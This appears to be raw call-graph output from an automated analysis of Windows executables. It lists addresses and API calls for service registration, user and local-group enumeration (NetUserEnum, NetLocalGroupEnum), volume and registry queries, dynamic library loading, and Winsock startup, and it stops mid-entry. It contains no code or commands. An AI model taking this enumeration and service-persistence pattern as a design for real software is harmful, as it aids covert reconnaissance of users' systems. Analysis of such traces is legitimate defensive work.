7ffe1150e21d 58045->58048 58046 7ffe1150e294 58046->58035 58053 7ffe1150e358 58047->58053 58054 7ffe1150e27b 58047->58054 58055 7ffe1150e224 58048->58055 58056 7ffe1150e255 58048->58056 58085 7ffe1150d822 56 API calls 58049->58085 58050->58035 58076 7ffe1150d1db 58050->58076 58087 7ffe1150dd0a 57 API calls 58053->58087 58057 7ffe1150e2a3 58054->58057 58058 7ffe1150e27d 58054->58058 58060 7ffe1150e22f 58055->58060 58061 7ffe1150e36d 58055->58061 58056->58035 58080 7ffe1150e0b6 20 API calls 58056->58080 58057->58035 58082 7ffe1150de24 57 API calls 58057->58082 58066 7ffe1150e366 58058->58066 58067 7ffe1150e288 58058->58067 58068 7ffe1150e23a 58060->58068 58069 7ffe1150e31b 58060->58069 58090 7ffe1150e146 20 API calls 58061->58090 58089 7ffe1150dfe2 53 API calls 58066->58089 58067->58035 58071 7ffe1150e28f 58067->58071 58068->58035 58079 7ffe1150d262 18 API calls 58068->58079 58084 7ffe1150d1e9 22 API calls 58069->58084 58081 7ffe1150d8f6 61 API calls 58071->58081 58091 7ffe1150d030 58076->58091 58079->58035 58080->58035 58081->58046 58082->58035 58083->58035 58084->58035 58085->58035 58086->58046 58087->58035 58088->58035 58089->58035 58090->58035 58118 7ffe11501b9b 58091->58118 58094 7ffe1150d05a 58094->58035 58097 7ffe1150d080 58124 7ffe11508f58 17 API calls 58097->58124 58098 7ffe1150d087 58100 7ffe11509395 GetSystemTimeAsFileTime 58098->58100 58101 7ffe1150d09a 58100->58101 58102 7ffe1150d1b8 58101->58102 58104 7ffe1150d0c6 strlen 58101->58104 58126 7ffe11508f58 17 API calls 58102->58126 58106 7ffe115040d2 10 API calls 58104->58106 58105 7ffe1150d1bd 58105->58094 58107 7ffe11501b9b 2 API calls 58105->58107 58108 7ffe1150d0fe GetProcessHeap HeapAlloc 58106->58108 58107->58094 58109 7ffe1150d120 58108->58109 58110 7ffe1150d19d 58108->58110 58111 7ffe11509395 GetSystemTimeAsFileTime 58109->58111 58112 7ffe115040d2 10 API calls 58110->58112 58113 7ffe1150d14f strcpy 58111->58113 58114 7ffe1150d1b3 58112->58114 58125 7ffe115014a2 17 API calls 58113->58125 58114->58102 58116 7ffe1150d178 58116->58101 58117 7ffe1150d181 GetProcessHeap HeapFree 58116->58117 58117->58101 58119 7ffe11501ba6 58118->58119 58120 7ffe11501bb1 QueryPerformanceFrequency QueryPerformanceCounter 58118->58120 58119->58094 58121 7ffe11508f37 EnterCriticalSection 58119->58121 58120->58119 58127 7ffe11507539 58121->58127 58124->58094 58125->58116 58126->58105 58128 7ffe11507555 58127->58128 58130 7ffe11507545 58127->58130 58133 7ffe1150648f 58128->58133 58131 7ffe1150754f 58130->58131 58155 7ffe11506d5f 58130->58155 58131->58097 58131->58098 58176 7ffe115063af 8 API calls 58133->58176 58135 7ffe11506ab2 58137 7ffe11506abb 58135->58137 58138 7ffe11506af8 58135->58138 58136 7ffe115069ac NetLocalGroupEnum 58139 7ffe115064a4 58136->58139 58140 7ffe11506c09 58137->58140 58146 7ffe11506ac3 58137->58146 58141 7ffe115040d2 10 API calls 58138->58141 58139->58135 58139->58136 58142 7ffe11506a22 GetProcessHeap HeapAlloc 58139->58142 58145 7ffe11506989 NetApiBufferFree 58139->58145 58144 7ffe115040d2 10 API calls 58140->58144 58141->58146 58147 7ffe11506a55 58142->58147 58148 7ffe115064b3 58142->58148 58150 7ffe11506ae5 58144->58150 58145->58139 58177 7ffe115063af 8 API calls 58146->58177 58151 7ffe11506a61 memcpy GetProcessHeap HeapFree 58147->58151 58152 7ffe11506a90 58147->58152 58148->58139 58153 7ffe115040d2 10 API calls 58148->58153 58149 7ffe11506ac8 58154 7ffe115040d2 10 API calls 58149->58154 58150->58130 58151->58152 58152->58130 58153->58148 58154->58150 58178 7ffe11506c7f 58155->58178 58157 7ffe115073c3 58160 7ffe115040d2 10 API calls 58157->58160 58167 7ffe115073cc 58157->58167 58158 7ffe115072a6 NetUserEnum 58161 7ffe11506d74 58158->58161 58159 7ffe1150751a 58164 7ffe115040d2 10 API calls 58159->58164 58160->58167 58161->58157 58161->58158 58163 7ffe11507283 NetApiBufferFree 58161->58163 58165 7ffe11507322 GetProcessHeap HeapAlloc 58161->58165 58162 7ffe11506c7f 8 API calls 58166 7ffe115073d9 58162->58166 58163->58161 58171 7ffe115073f6 58164->58171 58168 7ffe1150735c 58165->58168 58174 7ffe11506d83 58165->58174 58169 7ffe115040d2 10 API calls 58166->58169 58167->58159 58175 7ffe115073d4 58167->58175 58172 7ffe11507368 memcpy GetProcessHeap HeapFree 58168->58172 58173 7ffe115073a1 58168->58173 58169->58171 58170 7ffe115040d2 10 API calls 58170->58174 58171->58131 58172->58173 58173->58131 58174->58161 58174->58170 58175->58162 58176->58139 58177->58149 58179 7ffe11506d44 58178->58179 58185 7ffe11506c92 58178->58185 58179->58161 58180 7ffe11506d21 58180->58179 58181 7ffe11506d2d GetProcessHeap HeapFree 58180->58181 58181->58179 58182 7ffe11506ccd GetProcessHeap HeapFree 58182->58185 58183 7ffe11506cf2 GetProcessHeap HeapFree 58183->58185 58184 7ffe11506c9d LocalFree 58184->58185 58185->58180 58185->58182 58185->58183 58185->58184 58186 7ffe11506d19 LocalFree 58185->58186 58186->58185 58187 7ffe126e3937 58198 7ffe126e3941 58187->58198 58188 7ffe126e39da EnterCriticalSection 58188->58198 58189 7ffe126e3a27 EnterCriticalSection 58190 7ffe126e3a34 58189->58190 58191 7ffe126e3a8f LeaveCriticalSection 58190->58191 58192 7ffe126e3a40 WaitForSingleObject 58190->58192 58197 7ffe126e3a76 GetProcessHeap HeapFree 58190->58197 58214 7ffe126e2785 14 API calls 58192->58214 58193 7ffe126e3967 LeaveCriticalSection 58195 7ffe126e3a1a Sleep SleepEx 58193->58195 58193->58198 58195->58189 58197->58190 58198->58188 58198->58189 58198->58193 58201 7ffe126e39b9 GetProcessHeap HeapFree 58198->58201 58202 7ffe126e2072 58198->58202 58199 7ffe126e3994 WaitForSingleObject 58213 7ffe126e2785 14 API calls 58199->58213 58201->58198 58203 7ffe126e2080 58202->58203 58215 7ffe126eb130 58203->58215 58206 7ffe126e213c EnterCriticalSection 58208 7ffe126e2156 LeaveCriticalSection 58206->58208 58210 7ffe126e2173 58206->58210 58207 7ffe126e2107 fwrite fflush 58209 7ffe126e2130 58207->58209 58208->58207 58209->58199 58211 7ffe126e21ad CopyFileA 58210->58211 58212 7ffe126e21e5 58211->58212 58212->58208 58213->58198 58214->58190 58216 7ffe126eb155 58215->58216 58217 7ffe126eb13e 58215->58217 58222 7ffe126ec190 fputc WideCharToMultiByte _errno ___mb_cur_max_func ___lc_codepage_func 58216->58222 58221 7ffe126ec190 fputc WideCharToMultiByte _errno ___mb_cur_max_func ___lc_codepage_func 58217->58221 58220 7ffe126e20d9 58220->58206 58220->58207 58220->58209 58221->58220 58222->58220 58223 7ff7c1ab1b75 58253 7ff7c1ab161a 58223->58253 58226 7ff7c1ab1be4 RegisterServiceCtrlHandlerA 58227 7ff7c1ab1c25 GetLastError 58226->58227 58228 7ff7c1ab1c04 58226->58228 58232 7ff7c1ab2ef2 6 API calls 58227->58232 58272 7ff7c1ab1360 SetServiceStatus 58228->58272 58231 7ff7c1ab1bac 58331 7ff7c1ab1a63 10 API calls 58231->58331 58242 7ff7c1ab1b85 58232->58242 58233 7ff7c1ab1d18 58310 7ff7c1ab2ef2 58233->58310 58234 7ff7c1ab1c19 58273 7ff7c1ab16e3 58234->58273 58239 7ff7c1ab1bb1 58332 7ff7c1ab1b1c 13 API calls 58239->58332 58241 7ff7c1ab1bb6 58245 7ff7c1ab1dad ExitProcess 58241->58245 58246 7ff7c1ab1bbe 58241->58246 58244 7ff7c1ab1d71 58242->58244 58251 7ff7c1ab1b8d 58242->58251 58309 7ff7c1ab1360 SetServiceStatus 58242->58309 58243 7ff7c1ab1d48 58248 7ff7c1ab2ef2 6 API calls 58243->58248 58244->58245 58249 7ff7c1ab1bdd 58246->58249 58333 7ff7c1ab1360 SetServiceStatus 58246->58333 58247 7ff7c1ab1d32 58247->58243 58321 7ff7c1ab19e2 58247->58321 58248->58251 58251->58231 58330 7ff7c1ab1360 SetServiceStatus 58251->58330 58334 7ff7c1ab1fd0 GetModuleHandleExA 58253->58334 58258 7ff7c1ab164c 58259 7ff7c1ab1650 58258->58259 58396 7ff7c1ab28fc 58258->58396 58259->58226 58259->58242 58267 7ff7c1ab1fd0 8 API calls 58268 7ff7c1ab16b0 58267->58268 58269 7ff7c1ab7689 12 API calls 58268->58269 58270 7ff7c1ab16c9 58269->58270 58270->58259 58448 7ff7c1ab3452 58270->58448 58272->58234 58274 7ff7c1ab1fd0 8 API calls 58273->58274 58275 7ff7c1ab172e 58274->58275 58276 7ff7c1ab758b 8 API calls 58275->58276 58277 7ff7c1ab1743 58276->58277 58278 7ff7c1ab174d strlen 58277->58278 58290 7ff7c1ab1942 58277->58290 58280 7ff7c1ab1783 _mbscpy strlen strlen 58278->58280 58281 7ff7c1ab176a 58278->58281 58279 7ff7c1ab197a 58279->58242 58295 7ff7c1ab17ca 58280->58295 58281->58280 58282 7ff7c1ab176f strlen 58281->58282 58282->58280 58283 7ff7c1ab1938 58854 7ff7c1ab4788 FindClose 58283->58854 58285 7ff7c1ab47a3 12 API calls 58285->58295 58286 7ff7c1ab1959 58287 7ff7c1ab2ef2 6 API calls 58286->58287 58287->58279 58288 7ff7c1ab2304 8 API calls 58288->58295 58289 7ff7c1ab2ef2 6 API calls 58289->58290 58290->58279 58290->58286 58290->58289 58766 7ffe11ec1b80 58290->58766 58779 7ffe1a528a60 58290->58779 58797 7ffe126e90d0 58290->58797 58808 7ffe115054b0 58290->58808 58823 7ffe11bdff40 58290->58823 58840 7ffe1a4f1290 58290->58840 58855 7ff7c1ab1360 SetServiceStatus 58290->58855 58292 7ff7c1ab1895 58294 7ff7c1ab2ef2 6 API calls 58292->58294 58293 7ff7c1ab17ee FreeLibrary 58293->58295 58296 7ff7c1ab18ad GetProcessHeap HeapAlloc 58294->58296 58295->58283 58295->58285 58295->58288 58295->58292 58295->58293 58297 7ff7c1ab2283 8 API calls 58295->58297 58853 7ff7c1ab1360 SetServiceStatus 58295->58853 58299 7ff7c1ab18f6 58296->58299 58300 7ff7c1ab18cf _mbscpy 58296->58300 58297->58295 58302 7ff7c1ab2ef2 6 API calls 58299->58302 58300->58299 58301 7ff7c1ab191b 58300->58301 58301->58283 58301->58301 58302->58301 58309->58233 58311 7ff7c1ab2f00 58310->58311 60295 7ff7c1abaa60 58311->60295 58314 7ff7c1ab2fb0 58314->58247 58315 7ff7c1ab2f87 fwrite fflush 58315->58314 58316 7ff7c1ab2fbc EnterCriticalSection 58317 7ff7c1ab2fd6 LeaveCriticalSection 58316->58317 58318 7ff7c1ab2ff3 58316->58318 58317->58315 58319 7ff7c1ab302d CopyFileA 58318->58319 58320 7ff7c1ab3065 58319->58320 58320->58317 58322 7ff7c1ab1fd0 8 API calls 58321->58322 58323 7ff7c1ab1a11 58322->58323 58324 7ff7c1ab758b 8 API calls 58323->58324 58325 7ff7c1ab1a23 58324->58325 58326 7ff7c1ab1a29 58325->58326 58327 7ff7c1ab13cd 20 API calls 58325->58327 58326->58247 58328 7ff7c1ab1a3f 58327->58328 58328->58326 58329 7ff7c1ab1a4c SleepEx 58328->58329 58329->58326 58330->58231 58331->58239 58332->58241 58333->58249 58335 7ff7c1ab2002 GetLastError 58334->58335 58336 7ff7c1ab162f 58334->58336 58337 7ff7c1ab2ef2 6 API calls 58335->58337 58338 7ff7c1ab7689 58336->58338 58337->58336 58339 7ff7c1ab76cf 58338->58339 58340 7ff7c1ab769f 58338->58340 58342 7ff7c1ab2ef2 6 API calls 58339->58342 58471 7ff7c1ab758b 58340->58471 58347 7ff7c1ab1648 58342->58347 58344 7ff7c1ab76ff strlen 58345 7ff7c1ab7711 58344->58345 58346 7ff7c1ab7727 _mbscat strlen 58344->58346 58345->58346 58348 7ff7c1ab7716 strlen 58345->58348 58346->58347 58347->58258 58349 7ff7c1ab685f 58347->58349 58348->58346 58350 7ff7c1ab6962 58349->58350 58351 7ff7c1ab6876 58349->58351 58352 7ff7c1ab2ef2 6 API calls 58350->58352 58353 7ff7c1ab6992 58351->58353 58354 7ff7c1ab687f CreateFileA 58351->58354 58355 7ff7c1ab6917 58352->58355 58356 7ff7c1ab2ef2 6 API calls 58353->58356 58357 7ff7c1ab69c5 GetLastError 58354->58357 58358 7ff7c1ab68ca LockFileEx 58354->58358 58364 7ff7c1ab6c29 58355->58364 58365 7ff7c1ab6941 58355->58365 58356->58355 58359 7ff7c1ab2ef2 6 API calls 58357->58359 58360 7ff7c1ab6aaa GetLastError 58358->58360 58361 7ff7c1ab68fe 58358->58361 58370 7ff7c1ab69e6 58359->58370 58362 7ff7c1ab2ef2 6 API calls 58360->58362 58361->58355 58363 7ff7c1ab6c1b CloseHandle 58361->58363 58371 7ff7c1ab6acb 58362->58371 58363->58364 58366 7ff7c1ab2ef2 6 API calls 58364->58366 58367 7ff7c1ab2ef2 6 API calls 58365->58367 58368 7ff7c1ab1669 58366->58368 58367->58368 58368->58259 58372 7ff7c1ab309c InitializeCriticalSectionAndSpinCount 58368->58372 58369 7ff7c1ab6b53 58369->58363 58370->58360 58370->58369 58371->58369 58373 7ff7c1ab30ca 58372->58373 58374 7ff7c1ab31ed GetLastError 58372->58374 58375 7ff7c1ab1fd0 8 API calls 58373->58375 58376 7ff7c1ab2ef2 6 API calls 58374->58376 58377 7ff7c1ab30e6 58375->58377 58387 7ff7c1ab31c6 58376->58387 58378 7ff7c1ab758b 8 API calls 58377->58378 58379 7ff7c1ab30fa 58378->58379 58380 7ff7c1ab3104 strlen 58379->58380 58379->58387 58381 7ff7c1ab3133 58380->58381 58382 7ff7c1ab311d 58380->58382 58385 7ff7c1ab3158 strlen fopen 58381->58385 58386 7ff7c1ab3138 _mbscat strlen 58381->58386 58382->58381 58384 7ff7c1ab3122 strlen 58382->58384 58383 7ff7c1ab2ef2 6 API calls 58388 7ff7c1ab31e3 58383->58388 58384->58381 58389 7ff7c1ab31a4 58385->58389 58390 7ff7c1ab32ba 58385->58390 58386->58385 58387->58383 58388->58258 58391 7ff7c1ab2ef2 6 API calls 58389->58391 58392 7ff7c1ab2ef2 6 API calls 58390->58392 58393 7ff7c1ab31be 58391->58393 58392->58387 58393->58387 58394 7ff7c1ab332a 58393->58394 58395 7ff7c1ab2ef2 6 API calls 58394->58395 58395->58388 58485 7ff7c1ab2304 58396->58485 58400 7ff7c1ab2963 FreeLibrary 58404 7ff7c1ab29c3 GetNativeSystemInfo GetWindowsDirectoryA 58400->58404 58411 7ff7c1ab2999 58400->58411 58402 7ff7c1ab2ef2 6 API calls 58403 7ff7c1ab167e 58402->58403 58403->58259 58431 7ff7c1ab14ef 58403->58431 58405 7ff7c1ab2a02 GetLastError 58404->58405 58406 7ff7c1ab2ae0 58404->58406 58408 7ff7c1ab2ef2 6 API calls 58405->58408 58409 7ff7c1ab2ef2 6 API calls 58406->58409 58408->58411 58412 7ff7c1ab2b01 58409->58412 58410 7ff7c1ab2ef2 6 API calls 58410->58400 58411->58402 58412->58411 58501 7ff7c1ab9242 58412->58501 58414 7ff7c1ab2ef2 6 API calls 58420 7ff7c1ab2b3d 58414->58420 58415 7ff7c1ab2b4d GetVolumeInformationA 58416 7ff7c1ab2bb0 GetLastError 58415->58416 58417 7ff7c1ab2ca7 58415->58417 58419 7ff7c1ab2ef2 6 API calls 58416->58419 58418 7ff7c1ab2ef2 6 API calls 58417->58418 58421 7ff7c1ab2cc4 58418->58421 58419->58420 58420->58411 58420->58414 58420->58415 58422 7ff7c1ab2cdb strlen 58421->58422 58430 7ff7c1ab2ced 58421->58430 58422->58430 58432 7ff7c1ab1fd0 8 API calls 58431->58432 58433 7ff7c1ab1534 58432->58433 58434 7ff7c1ab758b 8 API calls 58433->58434 58435 7ff7c1ab1546 58434->58435 58436 7ff7c1ab1576 58435->58436 58437 7ff7c1ab154c _mbscpy 58435->58437 58439 7ff7c1ab2ef2 6 API calls 58436->58439 58528 7ff7c1ab13cd strlen 58437->58528 58442 7ff7c1ab15a1 58439->58442 58440 7ff7c1ab1572 58440->58436 58444 7ff7c1ab15f1 58440->58444 58442->58259 58442->58267 58446 7ff7c1ab2ef2 6 API calls 58444->58446 58446->58442 58449 7ff7c1ab3505 58448->58449 58450 7ff7c1ab347a 58448->58450 58451 7ff7c1ab2ef2 6 API calls 58449->58451 58452 7ff7c1ab4fc5 30 API calls 58450->58452 58453 7ff7c1ab3493 58451->58453 58463 7ff7c1ab3489 58452->58463 58454 7ff7c1ab349d GetProcessHeap HeapFree 58453->58454 58456 7ff7c1ab34b4 58453->58456 58454->58456 58455 7ff7c1ab2ef2 6 API calls 58459 7ff7c1ab37f2 58456->58459 58460 7ff7c1ab34dc 58456->58460 58457 7ff7c1ab35bd GetProcessHeap HeapAlloc 58461 7ff7c1ab3630 58457->58461 58468 7ff7c1ab35fa 58457->58468 58459->58455 58463->58453 58463->58457 58468->58453 58472 7ff7c1ab75d2 58471->58472 58473 7ff7c1ab759c 58471->58473 58476 7ff7c1ab2ef2 6 API calls 58472->58476 58474 7ff7c1ab75a1 58473->58474 58475 7ff7c1ab7602 58473->58475 58477 7ff7c1ab7632 58474->58477 58478 7ff7c1ab75aa 58474->58478 58479 7ff7c1ab2ef2 6 API calls 58475->58479 58482 7ff7c1ab75b7 58476->58482 58480 7ff7c1ab2ef2 6 API calls 58477->58480 58484 7ff7c1ab744c 8 API calls 58478->58484 58479->58482 58480->58482 58482->58344 58482->58347 58483 7ff7c1ab75af 58483->58482 58484->58483 58486 7ff7c1ab2312 LoadLibraryA 58485->58486 58487 7ff7c1ab233b 58485->58487 58488 7ff7c1ab2320 58486->58488 58489 7ff7c1ab233e GetLastError 58486->58489 58487->58489 58491 7ff7c1ab2ef2 6 API calls 58488->58491 58490 7ff7c1ab2ef2 6 API calls 58489->58490 58492 7ff7c1ab2339 58490->58492 58491->58492 58492->58411 58493 7ff7c1ab2283 58492->58493 58494 7ff7c1ab22d1 58493->58494 58495 7ff7c1ab22a0 GetProcAddress 58493->58495 58496 7ff7c1ab22d6 GetLastError 58494->58496 58495->58496 58497 7ff7c1ab22b1 58495->58497 58498 7ff7c1ab2ef2 6 API calls 58496->58498 58499 7ff7c1ab2ef2 6 API calls 58497->58499 58500 7ff7c1ab22cf 58498->58500 58499->58500 58500->58400 58500->58410 58502 7ff7c1ab926b 58501->58502 58520 7ff7c1ab92ca 58501->58520 58504 7ff7c1ab9274 58502->58504 58505 7ff7c1ab932d 58502->58505 58503 7ff7c1ab2ef2 6 API calls 58521 7ff7c1ab9323 58503->58521 58507 7ff7c1ab9360 58504->58507 58508 7ff7c1ab927d 58504->58508 58506 7ff7c1ab2ef2 6 API calls 58505->58506 58506->58521 58509 7ff7c1ab2ef2 6 API calls 58507->58509 58510 7ff7c1ab9286 RegOpenKeyExA 58508->58510 58511 7ff7c1ab9393 58508->58511 58509->58521 58512 7ff7c1ab93c6 RegQueryValueExA 58510->58512 58513 7ff7c1ab92ad 58510->58513 58514 7ff7c1ab2ef2 6 API calls 58511->58514 58526 7ff7c1ab93f4 58512->58526 58527 7ff7c1ab9447 RegCloseKey 58512->58527 58516 7ff7c1ab2ef2 6 API calls 58513->58516 58514->58521 58515 7ff7c1ab96c9 58518 7ff7c1ab2ef2 6 API calls 58515->58518 58516->58520 58517 7ff7c1ab96ec 58523 7ff7c1ab9569 58518->58523 58520->58503 58520->58521 58521->58515 58522 7ff7c1ab9526 58521->58522 58522->58517 58524 7ff7c1ab2ef2 6 API calls 58522->58524 58523->58420 58524->58523 58525 7ff7c1ab2ef2 6 API calls 58525->58526 58526->58525 58526->58527 58527->58521 58529 7ff7c1ab13e7 58528->58529 58530 7ff7c1ab13fd strlen 58528->58530 58529->58530 58531 7ff7c1ab13ec strlen 58529->58531 58581 7ff7c1ab6e87 58530->58581 58531->58530 58533 7ff7c1ab1425 58535 7ff7c1ab1487 strlen 58533->58535 58537 7ff7c1ab14c8 58533->58537 58539 7ff7c1ab14b4 strlen 58533->58539 58540 7ff7c1ab1436 58533->58540 58587 7ff7c1ab47a3 58533->58587 58536 7ff7c1ab6e87 8 API calls 58535->58536 58536->58533 58611 7ff7c1ab4788 FindClose 58537->58611 58539->58533 58540->58440 58541 7ff7c1ab7750 58540->58541 58542 7ff7c1ab77f2 58541->58542 58543 7ff7c1ab7772 58541->58543 58544 7ff7c1ab2ef2 6 API calls 58542->58544 58545 7ff7c1ab7822 58543->58545 58546 7ff7c1ab777b 58543->58546 58551 7ff7c1ab77a6 58544->58551 58547 7ff7c1ab2ef2 6 API calls 58545->58547 58612 7ff7c1ab4fc5 58546->58612 58547->58551 58550 7ff7c1ab7a9e 58551->58550 58553 7ff7c1ab2ef2 6 API calls 58551->58553 58555 7ff7c1ab15c7 58553->58555 58555->58436 58582 7ff7c1ab6e90 GetFileAttributesA 58581->58582 58583 7ff7c1ab6ea5 58581->58583 58584 7ff7c1ab6ed5 GetLastError 58582->58584 58586 7ff7c1ab6e9b 58582->58586 58585 7ff7c1ab2ef2 6 API calls 58583->58585 58584->58586 58585->58586 58586->58533 58588 7ff7c1ab47c3 58587->58588 58609 7ff7c1ab4809 58587->58609 58589 7ff7c1ab4862 58588->58589 58590 7ff7c1ab47cc 58588->58590 58594 7ff7c1ab2ef2 6 API calls 58589->58594 58592 7ff7c1ab47d5 58590->58592 58593 7ff7c1ab489a 58590->58593 58591 7ff7c1ab2ef2 6 API calls 58605 7ff7c1ab4853 58591->58605 58596 7ff7c1ab47e1 FindNextFileA 58592->58596 58597 7ff7c1ab48d2 FindFirstFileA 58592->58597 58595 7ff7c1ab2ef2 6 API calls 58593->58595 58594->58605 58595->58605 58598 7ff7c1ab4922 GetLastError 58596->58598 58599 7ff7c1ab47f7 _mbscpy 58596->58599 58597->58599 58600 7ff7c1ab48f3 GetLastError 58597->58600 58599->58609 58605->58533 58609->58591 58609->58605 58611->58540 58613 7ff7c1ab5065 58612->58613 58614 7ff7c1ab4fe7 58612->58614 58856 7ffe11ec9f6c InitializeCriticalSectionAndSpinCount 58766->58856 58769 7ffe11ec1b96 58770 7ffe11ec1b9a 58769->58770 58925 7ffe11ec296e WSAStartup 58769->58925 58770->58290 59083 7ffe1a52794c InitializeCriticalSectionAndSpinCount 58779->59083 58782 7ffe1a528a79 58784 7ffe1a528a7d 58782->58784 59152 7ffe1a521fce WSAStartup 58782->59152 58787 7ffe1a5277a2 6 API calls 58784->58787 58788 7ffe1a528a9a 58787->58788 58788->58290 58790 7ffe1a528aeb 58790->58784 59160 7ffe1a5264f8 InitializeCriticalSectionAndSpinCount 58790->59160 59415 7ffe126e221c InitializeCriticalSectionAndSpinCount 58797->59415 58800 7ffe126e90e6 58802 7ffe126e90ea 58800->58802 59482 7ffe126e328e WSAStartup 58800->59482 58802->58290 58806 7ffe126e9131 58806->58802 59490 7ffe126e3aa7 InitializeCriticalSectionAndSpinCount 58806->59490 59624 7ffe1150427c InitializeCriticalSectionAndSpinCount 58808->59624 58816 7ffe115054c6 58822 7ffe115054ca 58816->58822 59693 7ffe115062ae WSAStartup 58816->59693 58822->58290 59840 7ffe11bdc9fc InitializeCriticalSectionAndSpinCount 58823->59840 58826 7ffe11bdff56 58839 7ffe11bdff5a 58826->58839 59909 7ffe11bd8b63 InitializeCriticalSectionAndSpinCount 58826->59909 58839->58290 60087 7ffe1a4f14fc InitializeCriticalSectionAndSpinCount 58840->60087 58843 7ffe1a4f12a6 58844 7ffe1a4f12aa 58843->58844 60156 7ffe1a4f4b5e WSAStartup 58843->60156 58844->58290 58849 7ffe1a4f12f1 58849->58844 60164 7ffe1a4f2b78 InitializeCriticalSectionAndSpinCount 58849->60164 58853->58295 58854->58290 58855->58290 58857 7ffe11ec9f9a 58856->58857 58858 7ffe11eca0c0 GetLastError 58856->58858 58961 7ffe11ec4ac0 GetModuleHandleExA 58857->58961 58860 7ffe11ec9dc2 6 API calls 58858->58860 58864 7ffe11eca099 58860->58864 58866 7ffe11ec9dc2 6 API calls 58864->58866 58865 7ffe11ec9fd4 strlen 58867 7ffe11ec9fed 58865->58867 58868 7ffe11eca003 58865->58868 58871 7ffe11ec1b92 58866->58871 58867->58868 58872 7ffe11ec9ff2 strlen 58867->58872 58869 7ffe11eca028 strlen fopen 58868->58869 58870 7ffe11eca008 strcat strlen 58868->58870 58873 7ffe11eca18d 58869->58873 58874 7ffe11eca077 58869->58874 58870->58869 58871->58769 58880 7ffe11ecad94 58871->58880 58872->58868 58876 7ffe11ec9dc2 6 API calls 58873->58876 58978 7ffe11ec9dc2 58874->58978 58876->58864 58881 7ffe11ecadb6 58880->58881 58882 7ffe11ecadf9 58880->58882 58998 7ffe11ecaa00 58881->58998 58884 7ffe11ec9dc2 6 API calls 58882->58884 58885 7ffe11ec1bd1 58884->58885 58885->58770 58890 7ffe11ec44cc 58885->58890 58887 7ffe11ecae29 _errno _strtoui64 _errno 58887->58885 58888 7ffe11ecae5c _errno 58887->58888 58889 7ffe11ec9dc2 6 API calls 58888->58889 58889->58885 59040 7ffe11ec4df4 58890->59040 58926 7ffe11ec298a 58925->58926 58927 7ffe11ec29b2 58925->58927 58928 7ffe11ec9dc2 6 API calls 58926->58928 58929 7ffe11ec9dc2 6 API calls 58927->58929 58930 7ffe11ec1be1 58928->58930 58931 7ffe11ec29cb 58929->58931 58930->58770 58933 7ffe11ec17f8 InitializeCriticalSectionAndSpinCount 58930->58933 58932 7ffe11ec9dc2 6 API calls 58931->58932 58932->58930 58934 7ffe11ec181d CreateThread 58933->58934 58935 7ffe11ec189b GetLastError 58933->58935 58936 7ffe11ec1869 58934->58936 58937 7ffe11ec1973 GetLastError 58934->58937 58938 7ffe11ec9dc2 6 API calls 58935->58938 58940 7ffe11ec1a6c 58936->58940 58941 7ffe11ec1876 58936->58941 58939 7ffe11ec9dc2 6 API calls 58937->58939 58938->58941 58939->58941 58942 7ffe11ec9dc2 6 API calls 58940->58942 58943 7ffe11ec9dc2 6 API calls 58941->58943 58962 7ffe11ec4ae8 58961->58962 58963 7ffe11ec4af2 GetLastError 58961->58963 58965 7ffe11ec89db 58962->58965 58964 7ffe11ec9dc2 6 API calls 58963->58964 58964->58962 58966 7ffe11ec89ec 58965->58966 58967 7ffe11ec8a22 58965->58967 58968 7ffe11ec8a52 58966->58968 58969 7ffe11ec89f1 58966->58969 58970 7ffe11ec9dc2 6 API calls 58967->58970 58971 7ffe11ec9dc2 6 API calls 58968->58971 58972 7ffe11ec89fa 58969->58972 58973 7ffe11ec8a82 58969->58973 58976 7ffe11ec8a07 58970->58976 58971->58976 58989 7ffe11ec889c 8 API calls 58972->58989 58974 7ffe11ec9dc2 6 API calls 58973->58974 58974->58976 58976->58864 58976->58865 58977 7ffe11ec89ff 58977->58976 58979 7ffe11ec9dd0 58978->58979 58990 7ffe11ecd580 58979->58990 58989->58977 58999 7ffe11ecaa49 58998->58999 59000 7ffe11ecaa11 58998->59000 59001 7ffe11ec9dc2 6 API calls 58999->59001 59006 7ffe11eca6e9 59000->59006 59004 7ffe11ecaa28 59001->59004 59004->58885 59004->58887 59007 7ffe11eca71c 59006->59007 59008 7ffe11eca701 59006->59008 59009 7ffe11ec9dc2 6 API calls 59007->59009 59010 7ffe11eca706 59008->59010 59011 7ffe11eca74f 59008->59011 59017 7ffe11eca745 59009->59017 59012 7ffe11eca782 59010->59012 59021 7ffe11eca70b 59010->59021 59013 7ffe11ec9dc2 6 API calls 59011->59013 59014 7ffe11ec9dc2 6 API calls 59012->59014 59013->59017 59014->59017 59015 7ffe11eca7ec 59016 7ffe11eca7f3 59015->59016 59015->59017 59020 7ffe11ec9dc2 6 API calls 59017->59020 59018 7ffe11eca7c1 strcmp 59018->59021 59022 7ffe11eca809 59020->59022 59021->59015 59021->59018 59022->59004 59041 7ffe11ec4e2b 59040->59041 59042 7ffe11ec4e02 LoadLibraryA 59040->59042 59044 7ffe11ec4e2e GetLastError 59041->59044 59043 7ffe11ec4e10 59042->59043 59042->59044 59045 7ffe11ec9dc2 6 API calls 59043->59045 59046 7ffe11ec9dc2 6 API calls 59044->59046 59047 7ffe11ec44e0 59045->59047 59046->59047 59084 7ffe1a527aa0 GetLastError 59083->59084 59085 7ffe1a52797a 59083->59085 59086 7ffe1a5277a2 6 API calls 59084->59086 59212 7ffe1a527400 GetModuleHandleExA 59085->59212 59092 7ffe1a527a79 59086->59092 59091 7ffe1a5279b4 strlen 59094 7ffe1a5279e3 59091->59094 59095 7ffe1a5279cd 59091->59095 59093 7ffe1a5277a2 6 API calls 59092->59093 59096 7ffe1a527a96 59093->59096 59098 7ffe1a527a08 strlen fopen 59094->59098 59099 7ffe1a5279e8 strcat strlen 59094->59099 59095->59094 59097 7ffe1a5279d2 strlen 59095->59097 59096->58782 59107 7ffe1a528774 59096->59107 59097->59094 59100 7ffe1a527a57 59098->59100 59101 7ffe1a527b6d 59098->59101 59099->59098 59102 7ffe1a5277a2 6 API calls 59100->59102 59103 7ffe1a5277a2 6 API calls 59101->59103 59104 7ffe1a527a71 59102->59104 59103->59092 59104->59092 59105 7ffe1a527bdd 59104->59105 59108 7ffe1a5287d9 59107->59108 59109 7ffe1a528796 59107->59109 59110 7ffe1a5277a2 6 API calls 59108->59110 59230 7ffe1a5283e0 59109->59230 59112 7ffe1a5287af 59110->59112 59112->58784 59117 7ffe1a526e0c 59112->59117 59114 7ffe1a528809 _errno _strtoui64 _errno 59114->59112 59115 7ffe1a52883c _errno 59114->59115 59116 7ffe1a5277a2 6 API calls 59115->59116 59116->59112 59272 7ffe1a527734 59117->59272 59153 7ffe1a522012 59152->59153 59154 